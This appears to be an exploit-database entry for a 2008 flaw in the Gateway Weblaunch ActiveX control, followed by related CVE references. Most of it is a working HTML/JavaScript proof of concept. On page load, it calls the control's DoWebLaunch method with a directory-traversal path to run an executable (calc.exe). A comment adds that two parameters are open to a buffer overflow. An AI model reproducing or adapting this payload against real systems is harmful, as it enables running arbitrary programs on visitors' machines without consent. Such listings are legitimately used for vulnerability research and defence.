Lucene search
ElazarEDB-ID:4869HistoryJan 08, 2008 - 12:00 a.m.
Gateway Weblaunch - ActiveX Control Insecure Method
2008-01-0800:00:00
Elazar
www.exploit-db.com
40
AI Score
7.4
Confidence
Low
<!--
Gateway Weblaunch ActiveX Control Insecure Method Exploit
Implemented Categories:
Category: Safe for Initialising
Category: Safe for Scripting
Written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, weblaunch.ocx version 1.0.0.1
This method is also vulnerable to a buffer overflow in the 2nd and 4th parameters
-->
<html>
<head>
<title>Gateway Weblaunch ActiveX Control Insecure Method Exploit</title>
<script language="JavaScript" defer>
function Check() {
//escape from systemdrive\documents and settings\username\local settings\temp
obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\calc.exe","","");
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:93CEA8A4-6059-4E0B-ADDD-73848153DD5E" height="0" width="0">
Unable to create object
</object>
</body>
</html>
# milw0rm.com [2008-01-08]Related
cvelist
cvelist
CVE-2008-0220
2008-01-10 23:00:00
CVE-2008-0221
2008-01-10 23:00:00
prion
prion
Stack overflow
2008-01-10 23:46:00
Directory traversal
2008-01-10 23:46:00
cve
cve
CVE-2008-0220
2008-01-10 23:46:00
CVE-2008-0221
2008-01-10 23:46:00
nvd
nvd
CVE-2008-0220
2008-01-10 23:46:00
CVE-2008-0221
2008-01-10 23:46:00
exploitdb
exploitdb
Gateway WebLaunch - ActiveX Remote Buffer Overflow
2008-01-25 00:00:00